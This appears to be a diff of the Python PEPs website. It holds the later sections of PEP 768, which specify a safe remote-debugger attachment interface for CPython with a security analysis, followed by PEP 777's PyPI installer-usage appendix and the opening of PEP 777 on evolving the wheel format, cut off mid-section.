  11. Restores the original registers and continues execution
  12. +
+

Python tools face this same challenge of code injection, but with an additional layer of complexity. Not only do they need to implement the above mechanism, they must also understand and safely interact with CPython’s runtime state, including the interpreter loop, garbage collector, thread state, and reference counting system. This combination of low-level system manipulation and deep, domain-specific interpreter knowledge makes implementing Python debugging tools exceptionally difficult.

+

The few tools (see for example DebugPy +and Memray) +that do attempt this resort to suboptimal and unsafe methods, +using system debuggers like GDB and LLDB to forcefully inject code. This +approach is fundamentally unsafe because the injected code can execute at any +point during the interpreter’s execution cycle - even during critical operations +like memory allocation, garbage collection, or thread state management. When +this happens, the results are catastrophic: attempting to allocate memory while +already inside malloc() causes crashes, modifying objects during garbage +collection corrupts the interpreter’s state, and touching thread state at the +wrong time leads to deadlocks.

+

Various tools attempt to minimize these risks through complex workarounds, such +as spawning separate threads for injected code or carefully timing their +operations or trying to select some good points to stop the process. However, +these mitigations cannot fully solve the underlying problem: without cooperation +from the interpreter, there’s no way to know if it’s safe to execute code at any +given moment. Even carefully implemented tools can crash the interpreter because +they’re fundamentally working against it rather than with it.

+
+
+

Rationale

+

Rather than forcing tools to work around interpreter limitations with unsafe +code injection, we can extend CPython with a proper debugging interface that +guarantees safe execution. By adding a few thread state fields and integrating +with the interpreter’s existing evaluation loop, we can ensure debugging +operations only occur at well-defined safe points. This eliminates the +possibility of crashes and corruption while maintaining zero overhead during +normal execution.

+

The key insight is that we don’t need to inject code at arbitrary points - we +just need to signal to the interpreter that we want code executed at the next +safe opportunity. This approach works with the interpreter’s natural execution +flow rather than fighting against it.

+

After describing this idea to the PyPy development team, this proposal has +already been implemented in PyPy, +proving both its feasibility and effectiveness. Their implementation +demonstrates that we can provide safe debugging capabilities with zero runtime +overhead during normal execution. The proposed mechanism not only reduces risks +associated with current debugging approaches but also lays the foundation for +future enhancements. For instance, this framework could enable integration with +popular observability tools, providing real-time insights into interpreter +performance or memory usage. One compelling use case for this interface is +enabling pdb to attach to running Python processes, similar to how gdb allows +users to attach to a program by process ID (gdb -p <pid>). With this +feature, developers could inspect the state of a running application, evaluate +expressions, and step through code dynamically. This approach would align +Python’s debugging capabilities with those of other major programming languages +and debugging tools that support this mode.

+
+
+

Specification

+

This proposal introduces a safe debugging mechanism that allows external +processes to trigger code execution in a Python interpreter at well-defined safe +points. The key insight is that rather than injecting code directly via system +debuggers, we can leverage the interpreter’s existing evaluation loop and thread +state to coordinate debugging operations.

+

The mechanism works by having debuggers write to specific memory locations in +the target process that the interpreter then checks during its normal execution +cycle. When the interpreter detects that a debugger wants to attach, it executes the +requested operations only when it’s safe to do so - that is, when no internal +locks are held and all data structures are in a consistent state.

+
+

Runtime State Extensions

+

A new structure is added to PyThreadState to support remote debugging:

+
typedef struct _remote_debugger_support {
+    int debugger_pending_call;
+    char debugger_script[MAX_SCRIPT_SIZE];
+} _PyRemoteDebuggerSupport;
+
+
+

This structure is appended to PyThreadState, adding only a few fields that +are never accessed during normal execution. The debugger_pending_call field +indicates when a debugger has requested execution, while debugger_script +provides Python code to be executed when the interpreter reaches a safe point.

+

The value for MAX_SCRIPT_SIZE will be a trade-off between binary size and how big debugging scripts can be. As most of the logic should live in libraries, and arbitrary code can be triggered with a very small amount of Python, we propose starting with 4 KB initially. This value can be extended in the future if we ever need to.

+
+
+

Debug Offsets Table

+

Python 3.12 introduced a debug offsets table placed at the start of the +PyRuntime structure. This section contains the _Py_DebugOffsets structure that +allows external tools to reliably find critical runtime structures regardless of +ASLR or +how Python was compiled.

+

This proposal extends the existing debug offsets table with new fields for +debugger support:

+
struct _debugger_support {
+    uint64_t eval_breaker;            // Location of the eval breaker flag
+    uint64_t remote_debugger_support; // Offset to our support structure
+    uint64_t debugger_pending_call;   // Where to write the pending flag
+    uint64_t debugger_script;         // Where to write the script path
+} debugger_support;
+
+
+

These offsets allow debuggers to locate critical debugging control structures in +the target process’s memory space. The eval_breaker and remote_debugger_support +offsets are relative to each PyThreadState, while the debugger_pending_call +and debugger_script offsets are relative to each _PyRemoteDebuggerSupport +structure, allowing the new structure and its fields to be found regardless of +where they are in memory.
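The pointer arithmetic a debugger performs with these offsets might be sketched as follows; offsets is a stand-in for the parsed _Py_DebugOffsets data read from the target process:

def control_addresses(tstate_addr: int, offsets) -> tuple[int, int, int]:
    # These two offsets are relative to the thread state.
    eval_breaker = tstate_addr + offsets.eval_breaker
    support = tstate_addr + offsets.remote_debugger_support
    # These two are relative to the _PyRemoteDebuggerSupport structure.
    pending_flag = support + offsets.debugger_pending_call
    script_buf = support + offsets.debugger_script
    return eval_breaker, pending_flag, script_buf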

+
+
+

Attachment Protocol

+

When a debugger wants to attach to a Python process, it follows these steps:

+
    +
  1. Locate PyRuntime structure in the process:
      +
    • Find Python binary (executable or libpython) in process memory (OS dependent process)
    • +
    • Extract .PyRuntime section offset from binary’s format (ELF/Mach-O/PE)
    • +
    • Calculate the actual PyRuntime address in the running process by relocating the offset to the binary’s load address
    • +
    +
  2. +
  3. Access debug offset information by reading the _Py_DebugOffsets at the start of the PyRuntime structure.
  4. +
  5. Use the offsets to locate the desired thread state
  6. +
  7. Use the offsets to locate the debugger interface fields within that thread state
  8. +
  9. Write control information:
      +
    • Write a filename containing Python code to be executed into the +debugger_script field in _PyRemoteDebuggerSupport.
    • +
    • Set debugger_pending_call flag in _PyRemoteDebuggerSupport
    • +
    • Set _PY_EVAL_PLEASE_STOP_BIT in the eval_breaker field
    • +
    +
  10. +
+

Once the interpreter reaches the next safe point, it will execute the script +provided by the debugger.
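Putting the protocol together, the final write sequence might look like the sketch below. write_memory is a hypothetical helper over an OS facility such as process_vm_writev or WriteProcessMemory, the addresses come from the debug offsets as computed above, and the bit value shown is illustrative rather than CPython’s actual constant:

import struct

_PY_EVAL_PLEASE_STOP_BIT = 1 << 5  # illustrative; CPython defines the real bit

def request_exec(pid, eval_breaker_addr, pending_addr, script_addr, script_path):
    # Step 5a: write the path of the file containing the code to run.
    write_memory(pid, script_addr, script_path.encode() + b"\x00")
    # Step 5b: raise the pending-call flag.
    write_memory(pid, pending_addr, struct.pack("<i", 1))
    # Step 5c: set the stop bit so the interpreter reaches a safe point.
    # A real tool would OR the bit into the current value to preserve
    # any other eval-breaker flags, rather than overwrite it.
    write_memory(pid, eval_breaker_addr, struct.pack("<Q", _PY_EVAL_PLEASE_STOP_BIT))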

+
+
+

Interpreter Integration

+

The interpreter’s regular evaluation loop already includes a check of the eval_breaker flag for handling signals, periodic tasks, and other interrupts. We leverage this existing mechanism by checking for debugger pending calls only when the eval_breaker is set, ensuring zero overhead during normal execution. Indeed, profiling with Linux perf shows this branch is highly predictable - the debugger_pending_call check is never taken during normal execution, allowing modern CPUs to effectively speculate past it.

+

When a debugger has set both the eval_breaker flag and debugger_pending_call, +the interpreter will execute the provided debugging code at the next safe point. +This all happens in a completely safe context, since the interpreter is +guaranteed to be in a consistent state whenever the eval breaker is checked.

+

An audit event will be raised before the code is executed, allowing this mechanism +to be audited or disabled if desired by a system’s administrator.

+
// In ceval.c
+if (tstate->eval_breaker) {
+    if (tstate->remote_debugger_support.debugger_pending_call) {
+        tstate->remote_debugger_support.debugger_pending_call = 0;
+        const char *path = tstate->remote_debugger_support.debugger_script;
+        if (*path) {
+            if (0 != PySys_Audit("debugger_script", "%s", path)) {
+                PyErr_Clear();
+            } else {
+                FILE* f = fopen(path, "r");
+                if (!f) {
+                    PyErr_SetFromErrno(PyExc_OSError);
+                } else {
+                    PyRun_AnyFile(f, path);
+                    fclose(f);
+                }
+                if (PyErr_Occurred()) {
+                    PyErr_WriteUnraisable(...);
+                }
+            }
+        }
+    }
+}
+
+
+

If the code being executed raises any Python exception it will be processed as +an unraisable exception in +the thread where the code was executed.

+
+
+

Python API

+

To support safe execution of Python code in a remote process without having to +re-implement all these steps in every tool, this proposal extends the sys module +with a new function. This function allows debuggers or external tools to execute +arbitrary Python code within the context of a specified Python process:

+
def remote_exec(pid: int, code: str, timeout: int = 0) -> None:
+    """
+    Executes a block of Python code in a given remote Python process.
+
+    Args:
+         pid (int): The process ID of the target Python process.
+         code (str): A string containing the Python code to be executed.
+         timeout (int): An optional timeout for waiting for the remote
+            process to execute the code. If the timeout is exceeded a
+            ``TimeoutError`` will be raised.
+    """
+
+
+

An example usage of the API would look like:

+
import sys
+# Execute a print statement in a remote Python process with PID 12345
+try:
+    sys.remote_exec(12345, "print('Hello from remote execution!')", timeout=3)
+except TimeoutError:
+    print(f"The remote process took too long to execute the code")
+except Exception as e:
+    print(f"Failed to execute code: {e}")
+
+
+
+
+

Configuration API

+

To allow redistributors, system administrators, or users to disable this +mechanism, several methods will be provided to control the behavior of the +interpreter:

+

A new PYTHON_DISABLE_REMOTE_DEBUG environment variable will +be provided to control the behaviour at runtime. If set to any value (including an empty string), the +interpreter will ignore any attempts to attach a debugger using this mechanism.

+

This environment variable will be added together with a new -X disable-remote-debug +flag to the Python interpreter to allow users to disable this feature at runtime.

+

Additionally a new --without-remote-debug flag will be added to the +configure script to allow redistributors to build Python without support for +remote debugging if they so desire.

+

A new flag indicating the status of remote debugging will be made available via +the debug offsets so tools can query if a remote process has disabled the +feature. This way, tools can offer a useful error message explaining why they +won’t work, instead of believing that they have attached and then never having +their script run.

+
+
+
+

Backwards Compatibility

+

This change has no impact on existing Python code or interpreter performance. +The added fields are only accessed during debugger attachment, and the checking +mechanism piggybacks on existing interpreter safe points.

+
+
+

Security Implications

+

This interface does not introduce new security concerns as it is only usable by +processes that can already write to arbitrary memory within a given process and +execute arbitrary code on the machine (in order to create the file containing +the Python code to be executed).

+

Furthermore, the execution of the code is gated by the interpreter’s +audit hooks, which can be used to monitor or prevent the execution of the code +in sensitive environments.

+

Existing operating system security mechanisms are effective for guarding +against attackers gaining arbitrary memory write access. Although the PEP +doesn’t specify how memory should be written to the target process, in practice +this will be done using standard system calls that are already being used by +other debuggers and tools. Some examples are:

+
    +
  • On Linux, the process_vm_readv() +and process_vm_writev() system calls +are used to read and write memory from another process. These operations are +controlled by ptrace access mode +checks - the same ones that govern debugger attachment. A process can only read from +or write to another process’s memory if it has the appropriate permissions (typically +requiring either root or the CAP_SYS_PTRACE +capability, though less security minded distributions may allow any process running as the same uid to attach).
  • +
  • On macOS, the interface would leverage mach_vm_read_overwrite() and +mach_vm_write() through the Mach task system. These operations require +task_for_pid() access, which is strictly controlled by the operating +system. By default, access is limited to processes running as root or those +with specific entitlements granted by Apple’s security framework.
  • +
  • On Windows, the ReadProcessMemory() +and WriteProcessMemory() functions +provide similar functionality. Access is controlled through the Windows +security model - a process needs PROCESS_VM_READ +and PROCESS_VM_WRITE +permissions, which typically require the same user context or appropriate +privileges. These are the same permissions required by debuggers, ensuring +consistent security semantics across platforms.
  • +
+

All mechanisms ensure that:

+
    +
  1. Only authorized processes can read/write memory
  2. +
  3. The same security model that governs traditional debugger attachment applies
  4. +
  5. No additional attack surface is exposed beyond what the OS already provides for debugging
  6. +
  7. Even if an attacker can write arbitrary memory, they cannot escalate this +to arbitrary code execution unless they already have filesystem access
  8. +
+

The memory operations themselves are well-established and have been used safely +for decades in tools like GDB, LLDB, and various system profilers.

+

It’s important to note that any attempt to attach to a Python process via this +mechanism would be detectable by system-level monitoring tools as well as by +Python audit hooks. This transparency provides an additional layer of +accountability, allowing administrators to audit debugging operations in +sensitive environments.

+

Further, the strict reliance on OS-level security controls ensures that existing +system policies remain effective. For enterprise environments, this means +administrators can continue to enforce debugging restrictions using standard +tools and policies without requiring additional configuration. For instance, +leveraging Linux’s ptrace_scope +or macOS’s taskgated to restrict debugger access will equally govern the +proposed interface.

+

By maintaining compatibility with existing security frameworks, this design ensures that adopting the new interface requires no changes to established security policies.

+
+

Security scenarios

+
    +
  • For an external attacker, the ability to write to arbitrary memory in a +process is already a severe security issue. This interface does not introduce +any new attack surface, as the attacker would already have the ability to +execute arbitrary code in the process. This interface behaves in exactly +the same way as existing debuggers, and does not introduce any new additional +security risks.
  • +
  • For an attacker who has gained arbitrary memory write access to a process but +not arbitrary code execution, this interface does not allow them to escalate. +The ability to calculate and write to specific memory locations is required, +which is not available without compromising other machine resources that +are external to the Python process.
  • +
+

Additionally, the fact that the code to be executed is gated by the interpreter’s +audit hooks means that the execution of the code can be monitored and controlled +by system administrators. This means that even if the attacker has compromised the +application and the filesystem, leveraging this interface for malicious +purposes provides a very risky proposition for an attacker, as they risk +exposing their actions to system administrators that could not only detect the +attack but also take action to prevent it.

+

Finally, it is important to note that if an attacker has arbitrary memory write access to a process and has compromised the filesystem, they can already escalate to arbitrary code execution using other existing mechanisms, so this interface does not introduce any new risks in this scenario.

+
+
+
+

How to Teach This

+

For tool authors, this interface becomes the standard way to implement debugger +attachment, replacing unsafe system debugger approaches. A section in the Python +Developer Guide could describe the internal workings of the mechanism, including +the debugger_support offsets and how to interact with them using system +APIs.

+

End users need not be aware of the interface, benefiting only from improved +debugging tool stability and reliability.

+
+
+

Reference Implementation

+

A reference implementation with a prototype adding remote support for pdb +can be found here.

+
+
+

Rejected Ideas

+
+

Writing Python code into the buffer

+

We have chosen to have debuggers write the code to be executed into a file +whose path is written into a buffer in the remote process. This has been deemed +more secure than writing the Python code to be executed itself into a buffer in +the remote process, because it means that an attacker who has gained arbitrary +writes in a process but not arbitrary code execution or file system +manipulation can’t escalate to arbitrary code execution through this interface.

+

This does require the attaching debugger to pay close attention to filesystem +permissions when creating the file containing the code to be executed, however. +If an attacker has the ability to overwrite the file, or to replace a symlink +in the file path to point to somewhere attacker controlled, this would allow +them to force their malicious code to be executed rather than the code the +debugger intends to run.

+
+
+
+

Thanks

+

We would like to thank CF Bolz-Tereick for their insightful comments and suggestions +when discussing this proposal.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0768.rst

+

Last modified: 2024-12-16 15:42:45 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0777/appendix-pypi-download-analysis/index.html b/pep-0777/appendix-pypi-download-analysis/index.html new file mode 100644 index 00000000000..dbecc6a5ec7 --- /dev/null +++ b/pep-0777/appendix-pypi-download-analysis/index.html @@ -0,0 +1,155 @@ + + + + + + + + Appendix: Analysis of Installer Usage on PyPI | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

Appendix: Analysis of Installer Usage on PyPI

+
+

Note

+

This analysis is not perfect. While it uses the best available data, +mirrors, caches used by enterprises, and other confounding factors +could affect the numbers in this analysis. Consider the numbers as trends +rather than concrete reliable figures.

+
+

One pertinent question to PEP 777 is how frequently Python users update their +installer. If users update quite frequently, compatibility concerns are not as +important; users will be up-to-date by the time new features get added. On the +other hand, if users are frequently using older installers, then incompatible +wheels on PyPI would have a much wider impact. To figure out the relative share +of up-to-date vs outdated installers, we can use PyPI download statistics.

+

PyPI publishes a BigQuery dataset, +which contains information about each download PyPI receives, including +installer name and version when available. The following query was used to +collect the data for this analysis:

+
#standardSQL
+SELECT
+  details.installer.name as installer_name,
+  details.installer.version as installer_version,
+  COUNT(*) as num_downloads,
+FROM `bigquery-public-data.pypi.file_downloads`
+WHERE
+  -- Only query the last 6 months of data
+  DATE(timestamp)
+    BETWEEN DATE_TRUNC(DATE_SUB(CURRENT_DATE(), INTERVAL 6 MONTH), MONTH)
+    AND CURRENT_DATE()
+GROUP BY `installer_name`, `installer_version`
+ORDER BY `num_downloads` DESC
+
+
+

With the raw data available, we can start investigating how up-to-date +installers that download packages from PyPI are. The below chart shows the +breakdown by installer name of all downloads on PyPI for the six month period +from March 10, 2024 to September 10, 2024.

+A pie chart breaking down PyPI downloads by installer. pip makes up 87.5%, uv makes up 4.8%, poetry makes up 3.0%, requests makes up 1.6%, and "null" makes up 2.1%. + +

As can be seen above, pip is the most popular installer in this time frame. +For simplicity’s sake, this analysis will focus on pip installations when +considering how up-to-date installers are. pip has existed for a long +time, so analyzing the version of pip used to download packages should +provide an idea of how frequently users update their installers. Below is a +chart breaking down installations in PyPI over the same six month period, now +grouped by pip installer major version. pip uses calendar versioning, so +an installation from pip 20.x means that the user has not updated their pip +in four years.

+A pie chart breaking down PyPI downloads by pip major version. 24.x makes up 47.7%, 23.x makes up 19.9%, 22.x makes up 10.5%, 21.x makes up 13.9%, 20.x makes up 5.4%, and 9.x makes up 1.9%. + +

Over two thirds of users currently run pip from this year or last. However, +about 7% are on a version that is at least four years old(!). This indicates that +there is a long tail of users who do not regularly update their installers.
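As a rough sketch of how these shares can be reproduced, assuming the query results above were exported to a CSV file named pypi_downloads.csv:

import pandas as pd

df = pd.read_csv("pypi_downloads.csv")
pip = df[df["installer_name"] == "pip"].dropna(subset=["installer_version"]).copy()
# pip uses calendar versioning, so the major version doubles as a release year.
pip["major"] = pd.to_numeric(
    pip["installer_version"].str.split(".").str[0], errors="coerce"
)
shares = pip.groupby("major")["num_downloads"].sum()
print((100 * shares / shares.sum()).round(1).sort_index())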

+

Coming back to the initial question for PEP 777, it appears that caution should +be taken when publishing wheels with major version 2 to PyPI, as they are +likely to cause issues with a small but significant proportion of users who do +not regularly update their pip.

+
+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0777/index.html b/pep-0777/index.html new file mode 100644 index 00000000000..b9179a55c16 --- /dev/null +++ b/pep-0777/index.html @@ -0,0 +1,531 @@ + + + + + + + + PEP 777 – How to Re-invent the Wheel | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 777 – How to Re-invent the Wheel

+
+
Author:
+
Ethan Smith <ethan at ethanhs.me>
+
Sponsor:
+
Barry Warsaw <barry at python.org>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
09-Oct-2024
+
Post-History:
+
10-Oct-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

The current wheel 1.0 specification was written over a decade ago, +and has been extremely robust to changes in the Python packaging ecosystem. +Previous efforts to improve the wheel specification +were deferred to focus on other packaging +specifications. Meanwhile, the use of wheels has changed dramatically in the +last decade. There have been many requests for new wheel features over the +years; however, a fundamental obstacle to evolving the wheel specification has +been that there is no defined process for how to handle adding +backwards-incompatible features to wheels. Therefore, to enable other PEPs to +describe new enhancements to the wheel specification, this PEP prescribes +compatibility requirements on future wheel revisions. This PEP does not +specify a new wheel revision. The specification of a new wheel format +(“Wheel 2.0”) is left to a future PEP.

+
+
+

Rationale

+

Currently, wheel specification changes that require new installer behavior are backwards incompatible and require a major version increase in +the wheel metadata format. An increase of the wheel major version has yet to +happen, partially because such a change has the potential to be +catastrophically disruptive. Per +the wheel specification, +any installer that does not support the new major version must abort at install +time. This means that if the major version were to be incremented without +further planning, many users would see installation failures as older installers reject new wheels +uploaded to public package indices like the Python Package Index (PyPI). It is +critically important to carefully plan the interactions between build tools, +package indices, and package installers to avoid incompatibility issues, +especially considering the long tail of users who are slow to update their +installers.

+

The backward compatibility concerns have prevented valuable improvements +to the wheel file format, such as +better compression, +wheel data format improvements, +better information about what is included in a wheel, +and JSON formatted metadata in the “.dist-info” folder.

+

This PEP describes constraints and behavior for new wheel revisions to preserve +stability for existing tools that do not support a new major version of the wheel format. +This ensures that backwards incompatible changes to the wheel specification +will only affect users and tools that are properly set up to use the newer +wheels. With a clear path for evolving the wheel specification, future PEPs +will be able to improve the wheel format without needing to re-define a +completely new compatibility story.

+
+
+

Specification

+
+

Add Wheel-Version Metadata Field to Core Metadata

+

Currently, the wheel 1.0 PEP, PEP 427, specifies that wheel files +must contain a WHEEL metadata file that contains the version of the wheel +specification that the file conforms to. PEP 427 stipulates that installers +MUST warn on installation of a wheel with a minor version greater than supported, +and MUST abort on installation of wheels with a major version that is greater than +what the installer supports. This ensures that users do not get invalid +installations from wheels that installers cannot properly install.

+

However, resolvers do not currently exclude wheels with an incompatible wheel +version. There is also currently no way for a resolver to check a wheel’s +version without downloading the wheel directly. To make wheel version filtering +easy for resolvers, the wheel version MUST be included in the relevant +metadata file (currently METADATA). This will allow resolvers to +efficiently check the wheel version using the PEP 658 metadata API without +needing to download and inspect the .dist-info/WHEEL file.

+

To accomplish this, a new field, Wheel-Version, will be added to the +Core Metadata Specification. +This field is single use, and must contain the exact same version specified as +the Wheel-Version entry in the WHEEL file, or any future replacement +file defining metadata about the wheel file. If Wheel-Version is absent +from the metadata file, then tools MUST infer the wheel file major +version as 1.
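As a non-normative illustration of the inference rule above, assuming the core metadata is available as an email-header-format string (the helper name is hypothetical):

from email.parser import Parser

def wheel_major_version(core_metadata: str) -> int:
    # Per the rule above: a missing Wheel-Version field means the
    # wheel predates the field, so tools MUST infer major version 1.
    fields = Parser().parsestr(core_metadata)
    declared = fields.get("Wheel-Version")
    if declared is None:
        return 1
    return int(declared.split(".")[0])

assert wheel_major_version("Name: foo\nVersion: 1.0\n") == 1
assert wheel_major_version("Name: foo\nWheel-Version: 2.0\n") == 2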

+

Wheel-Version MUST NOT be included in source distribution metadata +(PKG-INFO) files. If a tool encounters Wheel-Version inside of a source +distribution metadata file, it SHOULD raise an error.

+

Wheel-Version MAY be included in the metadata file for wheels of +version 1, but for wheels of version 2 or higher, the metadata file MUST +include Wheel-Version. This enforces that future revisions of the wheel +specification can rely on resolvers skipping incompatible wheels by checking +the Wheel-Version field. Build backends are encouraged to include +Wheel-Version in all wheels that they generate, regardless of version.

+

Installers SHOULD copy the metadata file in a wheel unmodified during +installation. This prevents the need to update the RECORD file, which is +an error prone process. Tools reading installed core metadata SHOULD NOT +assume that the field is present, as other installation formats may omit it.

+

When installing a wheel, installers MUST take the following steps (a non-normative sketch follows the list):

+
    +
1. Check that the values of Wheel-Version in both the core metadata file and wheel metadata file match. If they do not match, installers MUST abort installation. Neither value takes precedence.
2. Check that the installer is compatible with Wheel-Version. If Wheel-Version is absent, assume the version is 1.0. Warn if the minor version is greater, abort if the major version is greater. This procedure is identical to that in PEP 427.
3. Proceed with installation as specified in the Binary Distribution Format specification.
+
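A sketch of the checks above; the names and signature are illustrative only, not part of the specification:

import warnings

class InstallAborted(Exception):
    pass

def check_wheel_version(core_value, wheel_file_value, supported=(1, 0)):
    # Step 1: both declared values must match exactly; neither wins.
    if core_value is not None and core_value != wheel_file_value:
        raise InstallAborted("Wheel-Version values disagree")

    # Step 2: absent means 1.0; abort on a newer major version,
    # warn on a newer minor version (as in PEP 427).
    parts = (wheel_file_value or "1.0").split(".")
    major = int(parts[0])
    minor = int(parts[1]) if len(parts) > 1 else 0
    if major > supported[0]:
        raise InstallAborted(f"cannot install wheel version {major}.{minor}")
    if (major, minor) > supported:
        warnings.warn(f"wheel version {major}.{minor} is newer than supported")

    # Step 3: proceed with installation per the Binary Distribution
    # Format specification (not shown).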
+
+

Resolver Behavior Regarding Wheel-Version

+

Resolvers, in the process of selecting a wheel to install, MUST check a +candidate wheel’s Wheel-Version, and ignore incompatible wheel files. +Without ignoring these files, older installers might select a wheel that uses +an unsupported wheel version for that installer, and force the installer to +abort per PEP 427. By skipping incompatible wheel files, users will not see +installation errors when a project adopts a new wheel major version. As already +specified in PEP 427, installers MUST abort if a user tries to directly +install a wheel that is incompatible. If, in the process of resolving packages +found in multiple indices, a resolver comes across two wheels of the same +distribution and version, resolvers should prioritize the wheel of the highest +compatible version.

+

While the above protects users from unexpected breakages, users may miss a new +release of a distribution if their installer does not support the wheel version +used in the release. Imagine in the future that a package publishes 3.0 wheel +files. Downstream users won’t see that there is a new release available if +their installers only support 2.x wheels. Therefore, installers SHOULD emit +a warning if, in the process of resolving packages, they come across an incompatible wheel +and skip it.
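A sketch of how a resolver might implement this skip-and-warn behavior; the candidate objects and their wheel_version and filename attributes are assumptions for illustration:

import warnings

SUPPORTED_MAJOR = 1  # whatever major version this installer implements

def compatible_candidates(candidates):
    for wheel in candidates:
        declared = wheel.wheel_version or "1.0"  # absent field means 1
        if int(declared.split(".")[0]) > SUPPORTED_MAJOR:
            # Skip, but tell the user a newer-format release exists.
            warnings.warn(
                f"ignoring {wheel.filename}: wheel format {declared} "
                "is newer than this installer supports")
            continue
        yield wheel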

+
+
+

First Major Version Bump Must Change File Extension

+

Unfortunately, existing resolvers do not check the compatibility of wheels +before selecting them as installation candidates. Until a majority of users +update to installers that properly check for wheel compatibility, it is unsafe +to allow publishing wheels of a new major version that existing resolvers might +select. It could take upwards of four years before the majority of users are on +updated resolvers, based on current data about PyPI installer usage (See the +Appendix: Analysis of Installer Usage on PyPI, for +details). To allow for experimentation and faster adoption of 2.0 wheels, +this PEP proposes a change to the file extension of the +wheel file format, from .whl to .whlx for all future wheel versions. +Note that x in whlx is the letter “x” and does not specify the wheel +major version. The change to extension name resolves the initial transition +issue of 2.0 wheels breaking users on existing installers that do not implement +Wheel-Version checks. By using a different file extension, 2.0 wheels can +immediately be uploaded to PyPI, and users will be able to experiment with the +new features right away. Users on older installers will simply ignore these new +files.

+

One rejected alternative would be to keep the .whl extension, but delay the +publishing of wheel 2.0 to PyPI. For more on that, please see Rejected Ideas.

+
+ +
+

Limitations on Future Wheel Revisions

+

While it is difficult to know what future features may be planned for the wheel +format, it is important that certain compatibility promises are maintained.

+

Wheel files, when installed, MUST stay compatible with the Python standard +library’s importlib.metadata for all supported CPython versions. For +example, replacing .dist-info/METADATA with a JSON formatted metadata file +MUST be a multi-major version migration with one version introducing the new +JSON file alongside the existing email header format, and another future +version removing the email header format metadata file. The version to remove +.dist-info/METADATA also MUST be adopted only after the last CPython +release that lacked support for the new file reaches end of life. This ensures +that code using importlib.metadata will not break with wheel major version +revisions.
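For instance, standard-library consumer code like the following, reading the installed .dist-info metadata of any installed distribution (pip here), must keep working across wheel format revisions:

from importlib.metadata import metadata, version

# Parses the email-header-format core metadata; the multi-version
# migration rule above exists so this keeps working.
md = metadata("pip")
print(md["Name"], version("pip"))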

+

Wheel files MUST remain ZIP format files as the outer container format. +Additionally, the .dist-info metadata directory MUST be placed at the +root of the archive without any compression, so that unpacking the wheel file +produces a normal .dist-info directory holding any metadata for the wheel. +Future wheel revisions MAY modify the layout, compression, and other +attributes about non-metadata components of a wheel such as data and code. This +assures that future wheel revisions remain compatible with tools operating on +package metadata, while allowing for improvements to code storage in the wheel, +such as adopting compression.

+

Package tooling MUST NOT assume that the contents and format of the wheel +file will remain the same for future wheel major versions beyond the +limitations above about metadata folder contents and outer container format. +For example, newer wheel major versions may add or remove filename components, +such as the build tag or the platform tag. Therefore it is incumbent upon +tooling to check the metadata for the Wheel-Version before attempting to +install a wheel.

+

Finally, future wheel revisions MUST NOT use any compression formats not in +the CPython standard library of at least the latest release. Wheels generated +using any new compression format should be tagged as requiring at least the +first released version of CPython to support the new compression format, +regardless of the Python API compatibility of the code within the wheel.

+
+
+
+

Backwards Compatibility

+

Backwards compatibility is an incredibly important issue for evolving the wheel +format. If adopting a new wheel revision is painful for downstream users, +package creators will hesitate to adopt the new standards, and users will be +stuck with failed CI pipelines and other installation woes.

+

Several choices in the above specification are made so that the adoption of a +new feature is less painful. For example, today wheels of an incompatible major +version are still selected by pip as installation candidates, which causes +installer failures if a project starts publishing 2.0 wheels. To avoid this +issue, this PEP requires resolvers to filter out wheels with major versions or +features incompatible with the installer.

+

This PEP also defines constraints on future wheel revisions, with the goal of +maintaining compatibility with CPython, but allowing evolution of wheel +contents. Wheel revisions shouldn’t cause package installations to break on +older CPython revisions, as not only would it be frustrating, it would be +incredibly hard to debug for users.

+

This PEP relies on resolvers being able to efficiently acquire package +metadata, usually through PEP 658. This might present a problem for users of +package indices that do not serve PEP 658 metadata. However, today most +installers fall back on using HTTP range requests to efficiently acquire only +the part of a wheel needed to read the metadata, a feature most storage +providers and servers include. Furthermore, future improvements to wheels +such as compression will make up performance losses due to inspecting files +in the wheel.

+

The main compatibility limitation of this PEP is for projects that start +publishing solely new wheels alongside a source distribution. If a user on an +older installer tries to install the package, it will fall back to the source +distribution, because the resolver will skip all newer wheels. Users are often +poorly set up to build projects from source, so this could lead to some failed +builds users would not see otherwise. There are several approaches to resolving +this issue, such as allowing dual-publishing for the initial migration, or +marking source distributions as not intended to be built.

+
+
+

Rejected Ideas

+
+

The Wheel Format is Perfect and Does not Need to be Changed

+

The wheel format has been around for over 10 years, and in that time, Python +packages have changed a lot. It is much more common for packages to include +Rust or C extension modules, increasing the size of packages. Better +compression, such as lzma or zstd, could save a lot of time and bandwidth for +PyPI and its users. Compatibility tags cannot express the wide variety of +hardware used to accelerate Python code today, nor encode shared library +compatibility information. In order to address these issues, evolution of the +wheel package format is necessary.

+
+
+

Wheel Format Changes Should be Tied to CPython Releases

+

I do not believe that tying wheel revisions to CPython +releases is beneficial. The main benefit of doing so is to make adoption of new +wheels predictable - users with the latest CPython get the latest package +format! This choice has several issues however. First, tying the new format +to the latest CPython makes adoption much slower. Users on LTS versions of +Linux with older Python installations are free to update their pip in a virtual +environment, but cannot update the version of Python as easily. While some +changes to the wheel format must be tied to CPython changes necessarily, such +as adding new compression formats or changing the metadata format, many changes +do not need to be tied to the Python version, such as symlinks, enhanced +compatibility tags, and new formats that use existing compression formats in +the standard library. Additionally, wheels are used across multiple different +language implementations, which lag behind the CPython version. It seems unfair +to prevent their users from using a feature due to the Python version. Lastly, +while this PEP does not suggest tying the wheel version to CPython releases, a +future PEP may still do so at any time, so this choice does not need to be made +in this PEP.

+
+
+

Keep Using .whl as the File Extension

+

